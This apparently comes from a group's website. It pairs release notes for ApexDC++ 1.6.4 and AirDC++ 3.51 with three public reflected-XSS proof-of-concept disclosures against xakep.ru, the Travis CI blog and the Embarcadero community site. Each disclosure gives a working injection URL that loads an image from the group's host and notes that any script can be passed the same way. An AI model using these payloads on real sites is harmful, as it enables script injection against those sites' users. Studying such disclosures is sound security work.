ApexDC++ 1.6.4
These official ApexDC++ 1.6.4 x86 + x64 installers were put into ZIP archive due to unavailability of sharing pure executable files on our website.Changes in 1.6.4
Fix: Connectivity issues related to new versions of zlib (DC++)Change: Updated zlib to version 1.2.11
Change: OpenSSL upgrade to 1.0.2k
File information: ApexDC++ 1.6.4
AirDC++ 3.51
This official AirDC++ 3.51 installer was put into ZIP archive due to unavailability of sharing pure executable files on our website.Changes in 3.51
Fixed:Fix a crash when receiving invalid ADC search results
Fix handling of (invalid) files that were modified more than 48 years ago
Retain listview focus when using back and up buttons in browserbar
Update OpenSSL (fixes encryption issues on certain CPU architectures)
File information: AirDC++ 3.51
Xakep.ru XSS bug
Vulnerable page: https://xakep.ru/PoC
https://xakep.ru/soon/?lang="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>
You can request any XSS code directly using GET method and lang parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Travis CI blog XSS bug
Vulnerable page: https://blog.travis-ci.com/PoC
https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>
You can either include any XSS code in search input box, or request any XSS code directly using GET method and q parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Embarcadero community XSS bug
Vulnerable page: https://community.embarcadero.com/PoC
https://community.embarcadero.com/blogs/blog-menu?search="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>
You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.